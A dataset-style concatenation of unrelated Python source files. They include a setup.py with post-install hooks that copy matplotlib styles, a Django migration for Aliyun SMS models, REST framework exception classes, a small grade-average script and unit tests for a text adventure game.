# From https://stackoverflow.com/questions/20288711/post-install-script-with-python-setuptools
class PostDevelopCommand(develop):
"""Post-installation for development mode."""
def run(self):
develop.run(self)
import matplotlib as mpl
import shutil
# ~ # ref -> matplotlib/style/core
BASE_LIBRARY_PATH = os.path.join(mpl.get_data_path(), "stylelib")
STYLE_PATH = os.path.join(os.getcwd(), os.path.join("sarkas", "mplstyles"))
STYLE_EXTENSION = "mplstyle"
style_files = glob.glob(os.path.join(STYLE_PATH, "*.%s" % (STYLE_EXTENSION)))
# Copy the plotting style in the matplotlib directory
for _path_file in style_files:
_, fname = os.path.split(_path_file)
dest = os.path.join(BASE_LIBRARY_PATH, fname)
shutil.copy(_path_file, dest)
print("%s style installed" % (fname))
class PostInstallCommand(install):
"""Post-installation for installation mode."""
def run(self):
install.run(self)
import matplotlib as mpl
import shutil
# ~ # ref -> matplotlib/style/core
BASE_LIBRARY_PATH = os.path.join(mpl.get_data_path(), "stylelib")
STYLE_PATH = os.path.join(os.getcwd(), os.path.join("sarkas", "mplstyles"))
STYLE_EXTENSION = "mplstyle"
style_files = glob.glob(os.path.join(STYLE_PATH, "*.%s" % (STYLE_EXTENSION)))
# Copy the plotting style in the matplotlib directory
for _path_file in style_files:
_, fname = os.path.split(_path_file)
dest = os.path.join(BASE_LIBRARY_PATH, fname)
shutil.copy(_path_file, dest)
print("%s style installed" % (fname))
# Package Requirements
BASE_DEPENDENCIES = [
"numpy",
"scipy",
"pandas",
"numba>=0.50",
"pyfftw",
"pyyaml",
"tables",
"tqdm",
"pyfiglet==0.8.post1",
"pickle5",
"jupyter",
"jupyterlab",
"notebook",
"matplotlib",
"seaborn",
]
# Get some values from the setup.cfg
conf = ConfigParser()
conf.read(["setup.cfg"])
metadata = dict(conf.items("metadata"))
PACKAGENAME = metadata.get("package_name")
DESCRIPTION = metadata.get("description")
DESCRIPTION_FILE = metadata.get("description-file")
PACKAGEDIR = metadata.get("package_dir")
VERSION = metadata.get("version")
AUTHOR = metadata.get("author")
AUTHOR_EMAIL = metadata.get("author_email")
LICENSE = metadata.get("license")
URL = metadata.get("url")
__minimum_python_version__ = metadata.get("minimum_python_version")
# Enforce Python version check - this is the same check as in __init__.py but
# this one has to happen before importing ah_bootstrap.
if sys.version_info < tuple((int(val) for val in __minimum_python_version__.split("."))):
sys.stderr.write("ERROR: packagename requires Python {} or later\n".format(__minimum_python_version__))
sys.exit(1)
# Read the README file into a string
with open(DESCRIPTION_FILE, "r") as fh:
long_description = fh.read()
# Treat everything in scripts as a script to be installed
scripts = [fname for fname in glob.glob(os.path.join("scripts", "*"))]
setuptools.setup(
name=PACKAGENAME, # Replace with your own username
version=VERSION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
description=DESCRIPTION,
long_description=long_description,
long_description_content_type="text/markdown",
url=URL,
scripts=scripts,
packages=setuptools.find_packages(),
install_requires=BASE_DEPENDENCIES,
# dependency_links = ["https://pypi.org/"],
classifiers=[
# Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.7",
# Call the classes above and run the post installation scripts
cmdclass={
"develop": PostDevelopCommand,
"install": PostInstallCommand,
},
)
| StarcoderdataPython |
3221144 | #@jacksontenorio8
"""Desenvolva um programa que leia as duas notas de um aluno,
calcule e mostre sua média"""
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m = float((n1 + n2) / 2)
print('A média entre {} e {} é igual a {:.2f}.'.format(n1, n2, m)) | StarcoderdataPython |
1785451 | <reponame>water-law/waterlawblog
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2019-10-15 13:59
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AliyunAccount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, verbose_name='阿里云用户名')),
('app_id', models.CharField(editable=False, max_length=64, verbose_name='阿里云app_id')),
('app_secret', models.CharField(editable=False, max_length=64, verbose_name='阿里云app_secret')),
],
),
migrations.CreateModel(
name='SmsMessage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone_numbers', models.CharField(max_length=30, verbose_name='短信接收号码')),
('params', models.TextField(blank=True, verbose_name='消息参数')),
('up_extend_code', models.CharField(blank=True, max_length=20, verbose_name='上行短信扩展码')),
('out_id', models.CharField(blank=True, max_length=30, verbose_name='外部流水扩展字段')),
('code', models.CharField(max_length=20, verbose_name='短信接口返回码')),
('created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='创建时间')),
],
options={
'ordering': ['-created'],
},
),
migrations.CreateModel(
name='SmsSign',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('signature', models.CharField(max_length=30, verbose_name='签名')),
('sign_type', models.SmallIntegerField(choices=[(1, '验证码或短信通知'), (2, '推广短信或群发助手')], default=1, verbose_name='签名类型')),
('price', models.FloatField(verbose_name='每条短信的价格')),
('sign_use', models.SmallIntegerField(choices=[(1, '签名为自己产品名/网站名'), (2, '签名为他人产品名/网站名')], default=1, verbose_name='签名用途')),
('enabled', models.BooleanField(default=True, verbose_name='是否启用')),
],
),
migrations.CreateModel(
name='SmsTemplate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, verbose_name='模版名称')),
('template_code', models.CharField(max_length=30, verbose_name='模版CODE')),
('template_type', models.SmallIntegerField(choices=[(1, '验证码'), (2, '短信通知')], default=1, verbose_name='模版类型')),
('price', models.FloatField(verbose_name='每条短信的价格')),
('params', models.TextField(blank=True, verbose_name='模板参数')),
('content', models.TextField(blank=True, verbose_name='模版内容')),
('enabled', models.BooleanField(default=True, verbose_name='是否启用')),
],
),
migrations.AddField(
model_name='smsmessage',
name='sign',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='misaka.SmsSign', verbose_name='短信签名'),
),
migrations.AddField(
model_name='smsmessage',
name='template',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='misaka.SmsTemplate', verbose_name='短信模板'),
),
]
| StarcoderdataPython |
1771193 | from rest_framework.exceptions import APIException, ValidationError, NotFound
class ExternalAPIError(APIException):
def __init__(self, detail=None, code=None):
APIException.__init__(self, detail=None, code=None)
if detail is None:
self.detail = {'error_code': 1100, 'message': "External API has problems"}
class NoAtError(ValidationError):
def __init__(self, detail=None, code=None):
ValidationError.__init__(self, detail=None, code=None)
if detail is None:
self.detail = {'error_code': 1000, 'message': "No 'at' query param"}
class InvalidAtError(ValidationError):
def __init__(self, detail=None, code=None):
ValidationError.__init__(self, detail=None, code=None)
if detail is None:
self.detail = {'error_code': 1001, 'message': "'at' is not valid"}
class StationNotFoundError(NotFound):
def __init__(self, detail=None, code=None):
NotFound.__init__(self, detail=None, code=None)
if detail is None:
self.detail = {'error_code': 1002, 'message': 'Station not found'}
class WeatherNotFoundError(NotFound):
def __init__(self, detail=None, code=None):
NotFound.__init__(self, detail=None, code=None)
if detail is None:
self.detail = {'error_code': 1003, 'message': 'Weather not found'}
| StarcoderdataPython |
3393205 | from django.urls import path, re_path
import had.app.views.api.v1.persons as api_persons
app_name = "app"
urlpatterns = []
urlpatterns = [
re_path(
r"^persons(/(?P<id>[\w-]+))?/?$",
api_persons.PersonApi.as_view(),
name="user_api"
)
]
| StarcoderdataPython |
3349709 | from random import randint
def generate_account_number ():
number = ''
for d in range (8):
number += str (randint (0, 10))
return number
if __name__ == '__main__':
print (generate_account_number())
| StarcoderdataPython |
3256260 | from setuptools import setup
version = '1.1.1'
with open('requirements.txt') as requirements:
install_requires = requirements.read().split()
setup(
name='pyfrappeclient',
version=version,
author='<NAME>',
author_email='<EMAIL>',
packages=[
'frappeclient'
],
install_requires=install_requires,
tests_requires=[
'httmock<=1.2.2',
'nose<=1.3.4'
],
)
| StarcoderdataPython |
97150 | """
Pylibui test suite.
"""
from pylibui.controls import Group, Control
from tests.utils import WindowTestCase
class GroupTest(WindowTestCase):
def setUp(self):
super().setUp()
self.group = Group('my group')
def test_title_initial_value(self):
"""Tests the group's `title` initial value is the one passed to the
constructor."""
self.assertEqual(self.group.title, 'my group')
def test_title_can_be_changed(self):
"""Tests the group's `title` attribute can be changed."""
new_title = 'My new group'
self.group.title = new_title
self.assertEqual(self.group.title, new_title)
def test_margins_initial_value(self):
"""Tests the group's `margin` initial value is False."""
self.assertEqual(self.group.margined, False)
def test_margins_can_be_changed(self):
"""Tests the group's `margin` attribute can be changed."""
self.group.margined = True
self.assertEqual(self.group.margined, True)
| StarcoderdataPython |
149219 | <reponame>Who8MyLunch/WanderBits<gh_stars>0
#!/usr/bin/python
from __future__ import division, print_function, unicode_literals
import os
import unittest
from context import wanderbits
class Test_Things(unittest.TestCase):
def setUp(self):
path_module = os.path.dirname(os.path.abspath(__file__))
f = os.path.join(path_module, '..', 'wanderbits', 'game.yml')
self.game_info = wanderbits.config.read(f)
def tearDown(self):
pass
def test_does_room_init(self):
info = self.game_info['rooms'][0]
wanderbits.things.Room(**info)
def test_does_item_init(self):
info = self.game_info['items'][0]
wanderbits.things.Item(**info)
def test_does_user_init(self):
info = self.game_info['user'][0]
wanderbits.things.User(**info)
def test_find_things(self):
name = 'apple'
many_things = [wanderbits.things.Item(**info) for
info in self.game_info['items']]
wanderbits.things.find_thing(many_things, name)
def test_init_abc(self):
# Should not be able to instanciate an abstract class.
self.assertRaises(TypeError, wanderbits.things.Thing)
#############################################
# Test for property values.
def test_property_name(self):
info = self.game_info['rooms'][0]
A = wanderbits.things.Room(**info)
self.assertTrue('kitchen' in A.name)
def test_property_description(self):
info = self.game_info['rooms'][0]
A = wanderbits.things.Room(**info)
txt = 'a very tidy average-looking kitchen'
self.assertTrue(A.description == txt)
def test_property_size(self):
info = self.game_info['rooms'][0]
A = wanderbits.things.Room(**info)
self.assertTrue(A.size == 1000)
def test_property_capacity(self):
info = self.game_info['rooms'][0]
A = wanderbits.things.Room(**info)
self.assertTrue(A.capacity == 1000)
#############################################
# Test for container actions.
def test_add_is_container(self):
info_apple = self.game_info['items'][0]
A = wanderbits.things.Item(**info_apple)
info_sack = self.game_info['items'][1]
B = wanderbits.things.Item(**info_sack)
# Put the apple in the sack.
B.add(A)
self.assertTrue(A in B.container)
def test_add_item_twice(self):
info_apple = self.game_info['items'][0]
A = wanderbits.things.Item(**info_apple)
info_sack = self.game_info['items'][1]
B = wanderbits.things.Item(**info_sack)
# Put the apple in the sack.
B.add(A)
# B.add(A)
# Put the apple in the sack again. I know! This is a dumb rule!
self.assertRaises(wanderbits.errors.ThingError, B.add, A)
def test_add_is_not_container(self):
info_apple = self.game_info['items'][0]
A = wanderbits.things.Item(**info_apple)
info_sack = self.game_info['items'][1]
B = wanderbits.things.Item(**info_sack)
# Put the sack in the apple.
# A.add(B)
self.assertRaises(wanderbits.errors.ThingError, A.add, B)
def test_available_space_init(self):
info_sack = self.game_info['items'][1]
B = wanderbits.things.Item(**info_sack)
self.assertTrue(B.available_space == 100)
def test_available_space_after_add(self):
info_apple = self.game_info['items'][0]
A = wanderbits.things.Item(**info_apple)
info_sack = self.game_info['items'][1]
B = wanderbits.things.Item(**info_sack)
B.add(A)
self.assertTrue(B.available_space == 99)
def test_remove(self):
info_apple = self.game_info['items'][0]
A = wanderbits.things.Item(**info_apple)
info_sack = self.game_info['items'][1]
B = wanderbits.things.Item(**info_sack)
B.add(A)
self.assertTrue(A in B.container)
B.remove(A)
self.assertTrue(A not in B.container)
# B.remove(A)
self.assertRaises(wanderbits.errors.ThingError, B.remove, A)
#############################################
# User as a container.
def test_user_local_things(self):
E = wanderbits.executive.Executive(self.game_info)
info_apple = self.game_info['items'][0]
A = wanderbits.things.Item(**info_apple)
info_sack = self.game_info['items'][1]
B = wanderbits.things.Item(**info_sack)
info_room = self.game_info['rooms'][0]
C = wanderbits.things.Item(**info_room)
info_rock = self.game_info['items'][2]
D = wanderbits.things.Item(**info_rock)
self.assertTrue(A.name in [n.name for n in E.user.local_things])
self.assertTrue(B.name in [n.name for n in E.user.local_things])
self.assertTrue(C.name in [n.name for n in E.user.local_things])
self.assertFalse(D.name in [n.name for n in E.user.local_things])
# Standalone.
if __name__ == '__main__':
unittest.main(verbosity=2)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.